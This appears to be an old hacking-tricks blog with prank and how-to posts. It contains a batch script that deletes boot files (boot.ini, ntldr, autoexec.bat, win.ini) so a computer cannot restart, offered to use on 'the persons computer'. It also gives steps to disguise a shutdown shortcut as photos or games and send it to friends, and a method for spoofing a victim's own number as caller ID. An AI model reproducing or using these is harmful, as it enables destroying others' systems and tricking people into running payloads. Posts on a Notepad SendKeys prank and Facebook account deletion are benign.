Friday, August 19, 2011

Shutdown your friends PC while chatting

Step 1: Make a shortcut on desktop by Right click on desktop, and then go to New, then Shortcut.

Step 2: Then in the "type location of the item" type: %windir%\system32\shutdown.exe -s -t 60 -c "Click It"
 Here 60 in time duration in seconds after which the computer will shutdown. You can change it to any.
Here “Click It” is the text which will appear on shutdown notice window. You can also change it.
Step 3: Click on next and given a name click on finish.

Step 4: Now right click on the shortcut and Change its name and icon to something interesting.

Step 5: Now to send it to some one you need to make a compressed file by right clicking on the desktop, go to New, Compressed file (zipped). Then Zipped folder will appear.

Step 6: Drag your shutdown virus into this zipped folder and rename it something interesting like photos/ games etc.

Step 7: Now send it to your friends and shutdown their pc while chatting.


Hacking Truth: This is not an actual virus. It is just the shortcut of SHUTDOWN. This trick will not harm your PC. So when your friend will restart his/her PC it will restart normally.

Note: When the timer will start, it can't be stopped even by deleting the file which you have created.

Shutdoen a Computer FOREVER

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Open up notepad and copy and paste it. Save it as a .bat file.

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.

njoy...

REMEMBER - DO NOT CLICK THIS FILE. (for the idiots)

YOU WONT RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!




Sunday, May 22, 2011

How To Make Notepad Write On Its Own


Hello Guys today another Awesome Trick I will share with you all.. Today I will show you " How to Write the Text automatically in Notepad" . This is a really an Awesome Prank .. You can show Your Friends and say that My Notepad Writes Automatically..So Read On..
STEPS:

1. Open the Notepad and Type the Code Given Below.

set wshshell = wscript.CreateObject("wscript.shell")
wsh
shell.run "Notepad"
wscript.sleep 2000
wshshell.AppActivate "Notepad"
WshShell.SendKeys "H"
WScript.Sleep 500
WshShell.SendKeys "ell"
WScript.Sleep 500
WshShell.SendKeys "o "
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys " Friends"


2. Save it as anyname.vbs (Note the vbs extension)

3. Now Open the anyname.vbs file by doublecliking on it and see the Magic..

Monday, January 24, 2011

Call your friends with their own number


Hello Friends after "Make Free Phone Calls From PC to mobile for free" hack today I am sahring With you a extremely Nice Prank or you can simply say Hack i.e "How To Call Your Friends From Their Own Cell Number

Mobile hack to call your friends

1. Go to http://www.mobivox.com/ and register there for free account.

2. During registration, remember to insert Victim mobile number in "Phone number" field.

3. Complete registration and confirm your email id and then login to your account. Click on "Direct WebCall".

4. You will arrive at page shown below. In "Enter a number" box, select your country and also any mobile number(you can enter yours). Now, simply hit on "Call Now" button to call your friend with his own number.

5. That's it. Your friend will be shocked to see their own number calling them.

Dlete your facebook account


Temporary Deletion of Facebook Account

Facebook has a wide range of applications that provide a means of entertainment to its registered users. It allows you to chat, store pictures and send messages. You can upload your profile information and store every kind of details in it. Once you have become a member of Facebook, you also have the option to deactivate your account. Deactivating is a temporary method to stagnate your account. Your personal info will be retained and once you reactivate, others can access your stored details. Here's the stepwise method of temporary deletion.
  • Log into your Facebook account and click on the 'Account' tab at extreme right.
  • You immediately get the 'Settings' tab. Scroll down and click on the 'Deactivate' option.
  • You will be asked for confirmation and a page will pop up asking you the reason for deletion.
  • Select the appropriate reason and then click the 'Deactivate' option at the end of page.
  • You will receive a message at the interface quoted as 'Your Facebook account has been deactivated'.
  • The message will also give you the opportunity to reactive, once you log in. For reactivation, you will receive an e-mail on your id from the Facebook team.
Permanent Deletion of Facebook Account

Make sure you have finalized your decision to completely delete Facebook account. Once you go for this option, you won't be able to reactivate it or get back your stored information. Before performing this step, it's always advised to erase all information from your account. Delete your friends, pictures, profile info, news feeds, applications, etc. from your account. Now follow the next steps to permanently delete Facebook account immediately.
You can always opt to permanently delete Facebook account in case your password has been leaked and people are misusing your account, thereby violating your privacy. To join once again, you have to go for a fresh registration process.

back to top